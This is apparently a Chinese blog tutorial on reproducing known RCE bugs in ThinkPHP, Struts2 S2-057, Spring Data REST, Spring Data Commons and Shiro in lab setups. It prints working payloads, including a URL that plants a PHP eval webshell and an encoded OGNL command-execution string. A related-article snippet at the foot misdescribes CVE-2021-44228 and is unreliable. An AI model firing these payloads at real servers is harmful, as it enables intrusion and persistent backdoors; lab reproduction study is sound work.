常见的框架漏洞----漏洞复现

已于 2024-08-07 19:20:11 修改
阅读量290 收藏 5
点赞数 7
文章标签: 安全
于 2024-08-07 14:04:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57682301/article/details/140989926
版权

一、ThinkPHP框架漏洞

1.搭建好环境,进入网站

2.访问index.php

3.在index.php后加?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami   可以看到终端的用户名

4.将问号后改成s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1  可以看到phpinfo信息

5.获得shell权限  将?后改为s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20@eval($_POST[cmd]);?>"%20>>13.php   即可将一句话木马输入到13.php内

6.访问植入的木马,成功证明注入成功

7.使用中国蚁剑,测试连接

二、S2-057远程执行代码漏洞

1.搭建环境,启动后再URL后加 /struts2-showcase  进入

2.在url后加   ${(123+123)}/actionChain1.action  运行后发现两数相加了

3.将上面验证payload的值修改为我们的利用exp 

/struts2-showcase/%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d/actionChain1.action

三、Spring Data Rest 远程命令执行命令(CVE-2017-8046)

1.搭建环境,启动并在URL后加/customers/1并进行抓包

2.使⽤PATCH请求来修改

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

3.成功发送数据包之后,可以进⼊docker容器内查看是否执⾏命令

四、spring 代码执⾏ (CVE-2018-1273)

1.搭建环境进入,并在URL后加/users

2.填写注册信息后抓包

3.加 上 poc  显示500为执行成功

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
 ouch /tmp/zcc")]=&password=&repeatedPassword=

4.进入终端查看  可以看到成功写入

docker exec -it 环境id名 /bin/bash

ls /tmp

五、Shiro rememberMe反序列化漏洞(Shiro-550)

1.搭建环境打开并抓包,在请求包中的cookie字段中添加 rememberMe=123;,看响应包 header中是否返回 rememberMe=deleteMe值,若有,则证明该系统使⽤了Shiro框架

2.利用工具shiro反序列化工具,爆破成功证明漏洞存在

3.在命令执行中输入whoami执行成功

狂i
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2012-4969漏洞分析
02-29
在测试漏洞时,使用Metasploit的exploit模块,设置好payload和需要的参数后,当访问特制的网址时,Metasploit框架能够在虚拟机中执行shellcode。尽管测试时IE浏览器崩溃但并未弹出计算器,没有完成预期的攻击,但...
ARL-NPoC:集漏洞验证和任务运行的一个框架 .zip
12-21
这通常包括复现漏洞,确定其利用条件,以及评估修复方案的有效性。ARL-NPoC框架旨在简化这一过程,通过提供一套工具和接口,使得这个复杂的任务变得更加标准化和自动化。 ARL-NPoC框架可能包含以下几个核心组件: ...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
复现这个漏洞的过程如下: 1. 首先,需要在环境中安装 Node.js 8.5.0。可以从官方发布的链接下载安装包,然后解压并将其移动到通用软件目录,并设置环境变量使其可全局使用。 2. 接着,安装 Express 的受影响版本...
CVE-2017-12615-master.zip
09-04
这个漏洞是由于Struts2框架中的一个配置错误所导致的,影响了多个版本的Struts2。 **一、Apache Struts2框架基础** Apache Struts2是一个流行的Java Web应用程序框架,它为开发人员提供了模型-视图-控制器(MVC)...
OV SSL证书:增强网站信任与安全的重要保障
alsknv的博客
08-20 1313
OV SSL证书,全称为Organization Validation SSL证书,是一种需要通过验证网站或组织真实身份才能颁发的SSL证书。它不仅能为网站提供数据传输的加密功能,还能向用户展示网站的真实身份,增强用户的信任感。OV证书适用于所有需要在线信任和安全的网站,特别是电子商务网站、在线银行、金融机构以及企业门户网站等。OV SSL证书_企业验证级SSL证书-JoySSLOV是英文单词Organization Validation的缩写,即单位组织信息验证。
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 287
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
叉车ai行人防撞预警系统,前后盲区防撞报警,让行车更安全
jiuxindianzi的博客
08-20 526
九盾叉车AI防撞预警系统,含九配件,三颗摄像头监测盲区与疲劳,可选车速等配件增强安全监测。特点包括实时监测、动态规划、高精度定位、多级防撞等,全方位保障叉车操作安全
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 344
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 150
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 469
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
适用于应用程序安全的 11 大 DevSecOps 工具
网络研究观
08-21 1333
发现用于应用程序安全的顶级 DevSecOps 工具,其功能包括代码安全、实时监控和漏洞修复等。
Day98:云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
m0_74402888的博客
08-24 1075
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接未授权访问获取secrets和token利用。
中间件安全
2201_75572825的博客
08-20 1199
Tomcat是一个开源的Java Servlet容器,它可以作为独立的Web服务器或应用服务器,也可以作为其他Web服务器的插件来使用,如Apache HTTP Server。Tomcat支持JavaServlet、JavaServer Pages (JSP) 、Java Expression Language (EL) 和WebSocket等Java技术,并提供了许多企业级特性,如集群、安全性和可扩展性。
趋势分享|Gartner解读中国企业容器管理新挑战:混合环境、容器安全、AI支持
SmartX 超融合
08-20 999
容器管理不应止于“管理容器”。
微服务及安全
qq_67812668的博客
08-20 1027
微服务(或称微服务架构)是一种云原生架构方法,将一个大型的应用程序拆分成一组小型、独立的服务。每个服务都可以独立开发、部署和扩展,且可以使用不同的编程语言和技术栈。这些服务之间通过轻量级的通信机制进行交互,通常是通过使用HTTP协议的API进行通信。
【闪送-注册安全分析报告】
08-20 1282
闪送作为快递行业知名的头部企业,在点对点送达业务占据很大的市场份额,拥有雄厚的技术实力,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 862
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
银行总分支文件分发系统:在安全与效率之间找到平衡
文件数据安全交换
08-21 785
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。支持自定义人工审批流程,包括多级、多人审批,会签、或签、转签,并支持与OA、BPM审批系统集成,自动邮件通知,确保文件外发安全合规、审批灵活便捷。业务报告:各种业务的月度、季度和年度报告,包括贷款、存款、投资等业务的统计数据;
CVE-2021-44228漏洞复现
07-27
CVE-2021-44228是一个安全漏洞,通常被称为“Spring Remote Code Execution (RCE)”,它影响了Spring Framework的一些版本,尤其是在处理恶意输入的情况下可能导致远程代码执行。这个漏洞涉及到Spring WebMVC框架中的`WebInputConverter`机制,攻击者通过精心构造的HTTP请求,可以利用该漏洞将恶意脚本注入到应用程序中。 复现实验需要以下步骤: 1. **环境搭建**:首先,你需要一个受影响的Spring应用实例,通常是运行在服务器上的,例如Tomcat或Jetty等Web容器。 2. **获取样本**:找到包含漏洞利用示例的PoC(Proof of Concept)代码,这通常包括一些特定的URL、POST数据以及可能的触发条件。 3. **模拟攻击**:创建一个本地工具(如curl、Postman或自动化测试框架),向服务器发送包含恶意payload的HTTP请求。payload可能包括JavaScript、SQL或其他能被执行的语言片段。 4. **检查响应**:观察服务器对请求的响应,如果返回了预期的异常结果或者执行了非授权的操作,那么就可能意味着复现成功。 5. **验证修复**:如果你的应用已经更新并修复了这个漏洞,尝试相同的请求,看看是否还能够触发漏洞。 请注意,实际操作时应在受控环境下进行,并确保遵守所有法律法规,切勿用于非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值